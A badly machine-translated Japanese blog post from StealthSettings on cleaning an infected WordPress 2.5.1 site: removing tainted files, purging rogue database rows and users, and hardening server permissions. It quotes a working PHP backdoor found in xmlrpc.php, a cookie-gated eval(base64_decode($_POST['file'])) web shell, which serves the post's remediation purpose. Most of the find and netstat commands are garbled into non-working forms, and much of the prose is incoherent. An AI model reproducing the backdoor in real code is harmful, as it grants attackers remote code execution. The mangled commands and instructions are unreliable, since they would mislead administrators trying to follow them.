WordPress エクスプロイト-ウイルスファイル、SQL、サーバーのセキュリティをクリーンアップします。

Update
1

あなたがこの記事を読む前に、あなたが表示されるはずです ここに投稿、何かを理解するために。 :)

私はそれを上のいくつかのブログファイルで見つけました stealthsettings.com、ウイルス感染の結果として表示された以下のようなコード の偉業 WordPress.:

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

XMLRPC上記のケースでは、ファイルについてです xmlrpc.php から 眠いですしかし、時 grep サーバーは、ソース内のこの種の非常に多くのコードのように見えます。

pppffiuuu

感染ファイルのクリーニング:

Ooookkkk ...
1。 最良の解決策は、それが行われた後に バックアップCPCと清掃データベースがにあります ワイプ ファイル WordPress (wp-config.phpと、wpプラットフォームに厳密に関連していないファイルは、注意深くチェックした後、保持できます)サーバーから、バージョンから元のファイルをアップロードします。 2.5.1 (この際:)アップグレードバージョンのWPを作ります) http://wordpress.org/download/ 。 あなたはそれらを慎重に確認することができます自信を持っている場合は、テーマを含むファイルを削除します。

ファイルが影響を受けたとブログで以前に使用し、簡単にテーマを変えていないテーマは、この問題を解決しないことは明らかです。

./andreea/wp-content/主題/default/index.php:

2。 含むすべてのファイルを検索し、削除します。* _new.php、_old.php * * .jpgg、.giff * * .pnggとファイルのwp-INFO.TXT、もしあれば。

見つける。 -名前「* _new.php」
見つける。 -名前「* _old.php」
見つける。 -名前「* .jpgg」
見つける。 -名前「* _giff」
見つける。 -名前「* _pngg」
見つける。 -名前「wp-info.txt」

3。 で / tmpに 、のようなフォルダを検索し、削除します tmpYwbzT2

クリーニングSQL :

1。 テーブル内のテーブル wp_options 行が消去場合は以下を参照してください。 internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2.すべてwp_options、に移動します active_plugins そして、拡張子* _new.php、_old.php * * .jpggのいずれかで終わるのプラグインがある場合、.giff * * .pnggを拭くか、別の拡張疑わしい場合は、慎重に確認してください。

3。 テーブル wp_users彼の右カラムには何も書かれていないユーザが存在する場合、参照してください。 user_nicename。 このユーザーを削除しますが、ID列の番号を覚えておいてください。 このユーザーは「WordPress" お気に入り USER_LOGIN それが作成され、00に表示されます。00:00 0000-00-00。

4。 表に移動します wp_usermeta 上記のIDに属するすべての行を削除します。

このsqlクリーンアップを実行した後、プラグインを無効にしてからアクティブにします。 (ブログ->ダッシュボード->プラグイン)

セキュアサーバー:

1。 「何であるかのディレクトリとファイルを参照してください。書き込み可能な"(chmod 777) を入れてみてください chmod これにより、どのレベルでも書き込みが許可されなくなります。 (chmod 例: 644)

見つけます。 許可します-2 -ls

2。 ビットセットを持っているもののファイルを参照してください。 SUID または SGID 。 あなたはそれらの上にこれらのファイルの場所を使用していない場合 chmod 0 またはそれに含まれるパッケージをアンインストールします。 彼らは実行権限をので、彼らは非常に危険です」グループヘッド「OR」ルート"ではなく、ファイルを実行しているユーザーの通常の権限を持ちます。

-ls許可します-04000 F見つける/ -type
-ls許可します-02000 F見つける/ -type

3。 開いているポートを確認し、閉じるために、またはそれらは使用されません確保してみてください。

netstatの-an | -iを聞くのgrep

そんなに。 私が参照してください。 いくつかのブログは禁止されています de Google Search 他の人は「彼はうまくやった!!!」と言います。 。 まあ、私は彼らのためにそうしたでしょう...でも、Googleが禁止し始めたらどうしますか 全てのサイト 形成  SE SPAM タックトロイの木馬(Trojan.Clicker.HTML)クッキーで?

テクノロジーに情熱を持っており、喜んで記事を書いています StealthSettings2006 年から .com を運営しています。私はオペレーティング システムに関して豊富な経験を持っています。 macOS, Windows シ Linuxだけでなく、プログラミング言語やブログ プラットフォームでも使用できます (WordPress) およびオンライン ストアの場合 (WooCommerce、Magento、PrestaShop)。

私が書いたチュートリアル。
アンチウイルスとセキュリティ インターネット 注目に値します チュートリアルとITニュース 微調整とハック WordPress
chmod エクスプロイト グループヘッド スパムです セキュリティ SQLインジェクション トロイの木馬ウイルスPC ウイルス検索 WordPress
» アンチウイルスとセキュリティ » WordPress エクスプロイト-ウイルスファイル、SQL、サーバーのセキュリティをクリーンアップします。

Google でブログかどうかを調べる方法 WordPress ウイルスですか

Googlebot などが見ているもの web crawlerあなたはいつウェブサイトにアクセスしますか?

1についての考えWordPress エクスプロイト – ウイルス ファイルのクリーニング、SQL およびサーバーのセキュリティ。」

  1. ピンバック: |ここで私は、テーマを変更しました 彼の無Krumel
コメント

Stealth Settings

Windows

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows ビスタ

Windows XP

Task Manager

How To

Microsoft 365 /オフィス

Microsoft 365 /オフィス

Excel

Word

PowerPoint

Outlook

Office 365 生産性

Linux &Webソフトウェア

nginxの

Apache HTTP Server

PHP

SQL/MySQL

CentOS

Ubuntu

ウェブホスティング

WordPress & WooCommerce

セキュリティとウイルス対策

Awareness

Antivirus & Security

マルウェア

スパイウェア

© Stealth Settings。 IT チュートリアルとニュース。

Politica deconfidențialitate | クッキーについて | お問い合わせ | 私たちに関しては